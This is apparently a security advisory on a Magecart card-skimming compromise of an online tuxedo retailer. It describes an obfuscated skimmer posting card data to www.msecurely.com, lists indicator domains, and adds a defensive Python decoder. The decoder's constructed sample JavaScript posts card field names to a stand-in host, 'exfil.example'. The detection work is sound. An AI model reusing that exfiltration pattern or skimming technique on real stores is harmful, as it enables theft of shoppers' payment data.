Online tuxedo retailer compromised by Magecart theft group
The externally hosted script performs Magecart’s main data-theft function and is obfuscated, with a large portion of it hex encoded.
Decoding this script reveals the following:
Shown above: the de-obfuscated script used to skim credit card information, pointing to the domain www.msecurely.com. The script looks for specific input fields, captures their data, and submits it over HTTPS via a POST request to the URL www.msecurely.com/checkout/onepage/.
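As an added defender-side example (not code from the advisory or from the skimmer itself), the following Python decodes the `\xNN` hex escapes a script of this kind hides its strings behind, then flags any host the decoded script talks to that is not first-party and any payment field names it references. The hosts `exfil.example` and `shop.example`, and the sample script, are constructed for the example; the field names are typical Magento checkout inputs and should be tailored to the site being checked.

```python
import re
from urllib.parse import urlparse

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?:/[\w./?=&%-]*)?")
# Input names a skimmer typically reads; extend from the site's own checkout form.
PAYMENT_FIELDS = ("cc_number", "cc_cid", "cc_exp", "cvv", "card")


def decode_hex_escapes(js: str) -> str:
    """Replace every \\xNN escape with the character it encodes."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), js)


def extract_hosts(text: str) -> set[str]:
    """Return the hostnames of all http(s) URLs found in text."""
    return {urlparse(u).hostname for u in URL_RE.findall(text)}


def find_exfil_hosts(js: str, first_party: set[str]) -> list[str]:
    """Hosts referenced by the decoded script that are not on the first-party list."""
    hosts = extract_hosts(decode_hex_escapes(js))
    return sorted(h for h in hosts if h and h not in first_party)


def reads_payment_fields(js: str) -> list[str]:
    """Payment field names that become visible once the script is decoded."""
    decoded = decode_hex_escapes(js).lower()
    return [f for f in PAYMENT_FIELDS if f in decoded]


# --- Constructed sample: built here to mimic the obfuscation style, not the real skimmer ---
def hex_escape(s: str) -> str:
    return "".join(f"\\x{ord(c):02x}" for c in s)


SAMPLE_JS = (
    f'var u="{hex_escape("https://exfil.example/checkout/onepage/")}";'
    f'var f=["{hex_escape("cc_number")}","{hex_escape("cc_cid")}"];'
    'fetch(u,{method:"POST",body:f.join(",")});'
)
FIRST_PARTY = {"shop.example", "static.shop.example"}  # assumed allow-list for the store

if __name__ == "__main__":
    print("non-first-party hosts:", find_exfil_hosts(SAMPLE_JS, FIRST_PARTY))
    print("payment fields referenced:", reads_payment_fields(SAMPLE_JS))
```

Any host this reports that is not a known first-party or payment-provider domain is worth blocking with a Content-Security-Policy `connect-src`/`form-action` directive and investigating on the server that serves the script.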
INDICATORS OF COMPROMISE:
encoderform.com – Domain hosted by credit card theft group
www.msecurely.com – POST /checkout/onepage/ – Domain hosted by credit card theft group